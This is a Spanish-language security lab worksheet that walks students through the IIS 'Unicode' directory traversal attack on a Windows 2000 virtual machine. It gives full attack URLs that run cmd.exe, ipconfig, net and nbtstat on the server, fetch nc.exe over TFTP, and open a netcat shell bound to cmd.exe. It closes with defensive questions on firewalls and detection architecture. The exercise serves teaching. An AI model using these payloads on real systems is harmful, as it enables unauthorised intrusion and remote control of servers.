  • 1. 1. Instale VMWARE7 de forma típica 2. Instale Windows 2000 Server en una máquina virtual con las opciones por defecto. Cuando elija el tamaño de disco utilizado sustituya 40GB por 2GB! 3. Una vez instalado el servidor abra su navegador y en URL introduzca http://localhost 1. ¿Tiene instalado el servidor web de Windows? ¿Qué nombre recibe? 2. ¿Qué versión es? 3. ¿Hay algún antivirus o Host IDS instalado? 4. Instale Windows 2000 Professional en otra máquina virtual. Cuando elija el tamaño de disco utilizado sustituya 40GB por 2GB! 5. El escenario que se quiere emular es el de la figura. Ataque UNICODE Francesc Pérez Fdez. 6. Desde MSDOS averigüe la IP del cliente y del servidor, haga un test de conectividad y verifique que se ven a nivel de capa 3. ¿Qué comandos ha utilizado? 7. Haga un barrido de puertos desde el cliente al servidor. ¿Qué programa ha utilizado? ¿En qué puertos el servidor espera peticiones? ¿A qué aplicaciones pertenecen dichos puertos y cuál es su función?
  • 2. 8. Desde el cliente haga un telnet al servidor por el puerto 80. ¿Qué comando ha utilizado? Pulse “enter” dos veces consecutivamente. ¿Qué mensaje muestra la salida de este comando? ¿Qué tipo y versión de servidor web está en ejecución en el servidor? 9. Busque en Internet información sobre el ataque UNICODE y descríbalo. ¿Se ajusta este ataque al escenario planteado? 10. Ataque: a. Desde el navegador del cliente ir a http://IP_SERVER/scripts/..%c0%af../windows/system32/cmd.exe?+/c+dir+c: ¿Qué muestra el servidor? b. Desde el navegador del cliente ir a Ataque UNICODE Francesc Pérez Fdez. b. Desde el navegador del cliente ir a http://IP_SERVER/scripts/..%c0%af../windows/system32/ipconfig.exe?+/all ¿Qué muestra el servidor? c. Desde el navegador del cliente ir a http://IP_SERVER/scripts/..%c0%af../windows/system32/net.exe?+view ¿Qué muestra el servidor? d. Cree una carpeta compartida en el servidor. Desde el navegador del cliente ir a http://IP_SERVER/scripts/..%c0%af../windows/system32/net.exe?+view+IP_SER VER ¿Qué muestra el servidor? e. Desde el navegador del cliente ir a http://IP_SERVER/scripts/..%c0%af../windows/system32/nbtstat.exe?+"- a"+IP_SERVER ¿Qué muestra el servidor?
  • 3. 10. Ataque: f. Instale el servidor TFTP en el cliente y copie en la carpeta el programa nc.exe que nos permitirá tener una shell remota en el servidor. g. Desde el navegador del cliente ir a http://IP_SERVER/scripts/..%c0%af../windows/system32/tftp.exe?"- i"+IP_CLIENTE+GET+nc.exe ¿Qué muestra el servidor? ¿Qué hemos hecho en este paso? Mire el contenido de la carpeta C:/Inetpub/scripts. Copie el resto de archivos de la carpeta de nc11nt, en caso contrario no funcionará! h. Ejecutaremos de forma remota la herramienta nc.exe desde el cliente. Para ello ir al navegador del cliente e introducir en la URL http://IP_SERVER/scripts/nc.exe?- l+-p+80+-t+-e+cmd.exe Especificamos que la conexión se realice mediante el Ataque UNICODE Francesc Pérez Fdez. l+-p+80+-t+-e+cmd.exe Especificamos que la conexión se realice mediante el puerto 80, que se quede en modo listening (esperando conexión entrante) y que después de la conexión se ejecute el programa cmd.exe i. Desde un cmd del cliente ejecute “nc IP_SERVER 80”. ¿Qué muestra la salida de dicho comando? ¿Dónde se encuentra? 11. ¿Solucionaría poner un firewall entre el cliente y el servidor? Explique por qué. 12. Dibuje con Edraw o Visio una arquitectura de red con los dispositivos software y hardware necesarios para crear un acceso seguro al servidor un detectar ataques UNICODE. Explique la función de cada elemento.